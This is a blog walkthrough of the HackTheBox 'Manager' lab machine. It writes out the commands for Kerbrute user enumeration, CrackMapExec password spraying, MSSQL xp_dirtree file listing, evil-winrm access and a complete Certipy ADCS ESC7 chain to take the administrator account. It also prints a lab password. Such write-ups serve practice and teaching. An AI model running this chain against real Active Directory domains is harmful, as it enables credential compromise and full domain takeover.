In today’s blog post, we will be going over the Manager, HTB Machine. Let’s get started, enjoy!
1)I started off with an enumeration of the open ports using Nmap:
nmap -sC -sV -A -T4 <TARGET_IP>
2)From here right away I tried SMB Null Session, RPC Enumeration and LDAP enumeration, but that didn’t work.
2.1)Since port 88 is open, Kerbrute can be nice way of enumerating users on the remote host!
kerbrute userenum -d <DOMAIN> /usr/share/seclists/SecLists-master/Usernames/xato-net-10-million-usernames.txt --dc <DC_IP>
2.2)While Kerbrute is running let’s enumerate the website
2.2.1)I did perform directory busting with dirsearch and ffuf and didn’t find any interesting directories. In addition to that I did perform subdomain enumeration with ffuf, but again nothing interesting.
2.2.2)One interesting thing that I found on the website is an image from the home page, pointing out to the note on the table, I downloaded the image, and tried to find something interesting in it, but no success either.
3)There is Microsoft SQL running as well, I tried leveraging default credentials just in case with sqsh but that didn’t worked out.
sqsh -S <target-ip> -U username -P password
4)At this point Kerbrute found dozen of usernames, but I don’t have a password. The only thing left to do is to try using the username as a password as well. I decided to do password spraying with Crackmapexec. First, save the found usernames to the users.txt:
Then, run crackmapexec as:
crackmapexec smb 10.10.11.236 -u users.txt -p users.txt -d manager.htb
Bingo, we got one hit:
5)Unfortunately this is not enough to get a shell, but we can run ldapdomaindump to enumerate the machine more:
Sudo ldapdomaindump -u '<domain>\<user>' -p '<password>' <DC_IP>
From here we can see that our next target is Ryan as he is part of Remote Management Users:
6)Back to MS SQL Server, I tried leveraging newly obtain creds–> operator:operator with impacket-mssqlclient (I had some issues with impacket-mssqlclient with my currently installed version so I a started Python virtual environment then installed impacket from the scratch and then everything was fine)
6.1) python3 -m venv venv
6.2) source venv/bin/activate
6.3)pip3 install impacket
Now we are ready to connect to the MS SQL: ### It’s important to mention that it’s very important to pass -windows-auth as indicated in Hacktricks if we do specify a domain ### https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py manager.htb/operator@10.10.11.236 -port 1433 -windows-auth
7)From here I thought that the intended path is to obtain NTLMv2 hash by initiating a connection to Responder that will intercept the request. I was following steps from the Hackticks: https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
I was able to obtain the NTLMv2 hash from the Manager, but I wasn’t able to crack it using Hashcat and rockyou.txt
7.1)Back to initial enumeration to see if we can find something interesting in the database itself.
7.2)I enumerated the database for a while and tried all sorts of different things until I executed help command from the impacket’s mssqlclient, where I saw that we can list local files with xp_dirtree command: https://exploit-notes.hdks.org/exploit/database/mssql-pentesting/
So I first just executed xp_ditree and from there enumerated every directory separately:
7.3)Until I reached inetpub directory
7.4)From here we can see interesting backup directory that I wasn’t able to find using dirsearch/ffuf and other directory busting tools:
7.5)So I navigated back to the website and downloaded the zip file by navigating to it.
7.6)Opening the Zip File we found an interesting XML file with old configuration
7.7)Finally we can get a shell using evil-winrm and user.txt flag is ours:
evil-winrm -u raven -i 10.10.11.236
8)I launched the BloodHound for further enumeration as well as the WinPeas but I didn’t find any privilege escalation routes that I can take advantage of, until I executed:
whoami /groups
From here we can see an Interesting group that we are part of: Certificate Service DCOM Access
8.1)There is many privileges escalation paths related to the Active Directory Certificates (ADCS), so let’s see if we can take one. Perfect tool for that is Certipy which can be found here: https://github.com/ly4k/Certipy. Let’ see what we got when we leverage Ryan’s creds:
###Just a quick note that I had some problems with version of certipy already installed on my virtual machine so I installed the stable version using Python virtual environment ###
1)python3 -m venv venv
2)source venv/bin/activate
3)pip3 install certipy-ad
certipy find -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
8.2)If everything is fine we will get 3 files (.json, .txt and .zip) .zip and .json are great for Bloodhound for further enumeration, but in this case, I will just enumerate .txt more with simple cat command:
Great! From here we can see that Raven has dangerous permission and the privilege escalation path is ESC7: https://github.com/ly4k/Certipy?tab=readme-ov-file#esc7
8.3)Before we get started with attack execution it’s important to mention that being fast here is crucial because of the server settings:
8.3.1)Let’s add Raven as an officer:
certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
### From the image above we obtained the certificate name: manager-DC01-CA and DNS Name as well: dc01.manager.htb ###
8.3.2)Let’s enable SubCA Template
certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
8.3.3)Let’s request the certificate:
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb -dc-ip 10.10.11.236
### It will fail but that is fine ###
8.3.4)Let’s try again based on the request-id
certipy ca -ca 'manager-DC01-CA' -issue-request <request_id> -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
8.3.4)One last step is to get the administrator’s certificate
8.3.5)Now from here we are only 1 step away from obtaining Administrator’s NTLM(SAM) hash that we can use with evil-winrm and to obtain interactive Shell as Admin, BUT:
8.3.6)So we now have administrator.pfx certificate that we can use with certipy again as:
certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
But there is a weird error about Kerberos Session… Hm…
I-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
9)With some investigating I found out that usually the problem is with the machine itself without going too much in detail about the issue itself I tried restarting the machine a couple of times + switching VPN Connections, but nothing worked out. Then I tried using Rubeus.exe on the remote host by transferring it alongside with admin.pfx cert but the same error again…
9.1)From here I decided to continue with Pass the Cert Attack over the ldap, by following this article: https://arth0s.medium.com/hackthebox-authority-write-up-ebef7cb8a41a but that approach is not sufficient for our Manager Machine.
9.2)Then I spent a lot, A LOT of time trying to find out what is the root cause of the issue without any success until I stumbled upon this comment on HTB Forum:
9.3)So I was right from the very beginning it was the machine problem. I had to cheat here a little bit by visiting https://0xdf.gitlab.io/2024/03/16/htb-manager.html# and getting NTLM hash for the admin in order to authenticate to the machine and to run gpupdate /force command.
9.4)Okay, back to our ESC7 ADCS Attack, this time I got error but a different one regarding the time (as my local time didn’t match the target machine time)
9.5)In order to fix this visit: https://medium.com/@danieldantebarnes/fixing-the-kerberos-sessionerror-krb-ap-err-skew-clock-skew-too-great-issue-while-kerberoasting-b60b0fe20069
9.6)Now let’s ruin command from 9.4 again and this time we get as hash, finally…
9.7)We can leverage that hash with evil-winrm and we solved the machine!
Lessons Learned
1) Brute force sometimes may be the only way in. I usually forgot about it as I think that is not the intended path, but sometimes indeed it is. Here we were stuck with a bunch of usernames obtained with Kerbrute and that is all we got, so we used crackmapexec with usernames being passwords as well and we got lucky!
2)Having access to MS SQL Server when dealing with AD Machines doesn’t necessarily mean that our attack vector is to obtain NTLMv2 hash with Responder that we can crack. With this machine, I learned a lot about the xp_dirtree module from Impacket that can be used to List files on the remote host, which enabled us to find that hidden directory on the web server.
3)Finally, I learned about ADCS ESC7 Attack Vector for Privilege Escalation and a few more tricks with Certipy. All in all great machine and an amazing experience!
Leave a Reply